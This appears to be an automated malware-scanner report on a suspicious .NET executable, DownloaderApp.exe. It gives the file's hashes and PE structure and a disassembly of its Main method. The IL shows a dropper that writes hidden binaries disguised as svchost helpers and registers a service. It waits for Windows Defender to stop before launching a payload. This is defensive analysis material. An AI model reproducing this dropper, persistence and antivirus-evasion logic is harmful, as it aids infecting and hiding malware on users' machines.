Suspicious
Suspect

043eab0dd94c303a7776c4c0ea39d97c

PE Executable
|
MD5: 043eab0dd94c303a7776c4c0ea39d97c
|
Size: 2.63 MB
|
application/x-dosexec


Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
Hash Value
MD5
043eab0dd94c303a7776c4c0ea39d97c
Sha1
3d72afe6e410c1380315dc5da1fb6e3ef4b7a18c
Sha256
0d95e636a7e133f2d04f8cdcc0e7e46628a3172f6f5e8e3f2ceea014c911fd4c
Sha384
49d1ec4f9139942d5dc98fd000ba6425291abfca4ec3356f2150960a848a568114d21a75c8c703b2c766870844965b62
Sha512
e8deb5d62e089e6f4b59adada624e76f16c76ff67056f3d05ac7e200f9a60128cab17b65978e5b4a403f39d98d78fc522d56a9bda03aab06941d249104f1ac0f
SSDeep
49152:X/L8qKcmyGRGcPzYUHXv2U7lkHoT2PUiLD7a+QGdQG/x:X/vmr8PU3v2UxcNLP3QGT
TLSH
AFC5336D63EE70A8E0EF577D7EB1C80602B33212B666D52427D0D04EC8A763B94D7768
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
VgI6sEaGlOH8.T7a5F.HflQ7
VgI6sEaGlOH8.AvnEYS.qwebX
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Info

PDB Path: C:\10\boot\Downloader_win\DownloaderApp\DownloaderApp\obj\Release\DownloaderApp.pdb

Module Name

DownloaderApp.exe

Full Name

DownloaderApp.exe

EntryPoint

System.Void A.B::Main(System.String[])

Scope Name

DownloaderApp.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

DownloaderApp

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.7.2

Total Strings

25

Main Method

System.Void A.B::Main(System.String[])

Main IL Instruction Count

84

Main IL

call System.Boolean A.B::C() brtrue.s IL_0015: call System.Boolean System.Environment::get_UserInteractive() call System.Void A.B::D() leave.s IL_0014: ret pop <null> leave IL_00F3: ret ret <null> call System.Boolean System.Environment::get_UserInteractive() brtrue.s IL_0027: ldstr "svchosthelper.exe" newobj System.Void A.E::.ctor() call System.Void System.ServiceProcess.ServiceBase::Run(System.ServiceProcess.ServiceBase) ret <null> ldstr svchosthelper.exe stloc.0 <null> ldstr systemhelper.exe stloc.1 <null> ldstr WindowsLogsHelper stloc.2 <null> ldc.i4.s 36 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) dup <null> ldloc.0 <null> call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.1 <null> call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldstr VgI6sEaGlOH8.T7a5F.HflQ7 ldloc.3 <null> call System.Void A.B::F(System.String,System.String) ldstr VgI6sEaGlOH8.AvnEYS.qwebX ldloc.s V_4 call System.Void A.B::F(System.String,System.String) ldloc.3 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_4 ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) call System.Void A.B::H() ldloc.3 <null> ldloc.2 <null> call System.Void A.B::I(System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_4 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.r8 3 call System.TimeSpan System.TimeSpan::FromMinutes(System.Double) call System.Boolean A.B::WaitForDefenderStopped(System.TimeSpan) brfalse.s IL_00EE: leave.s IL_00F3 ldloc.3 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00EE: leave.s IL_00F3 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.3 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave.s IL_00F3: ret pop <null> leave.s IL_00F3: ret ret <null>

043eab0dd94c303a7776c4c0ea39d97c (2.63 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙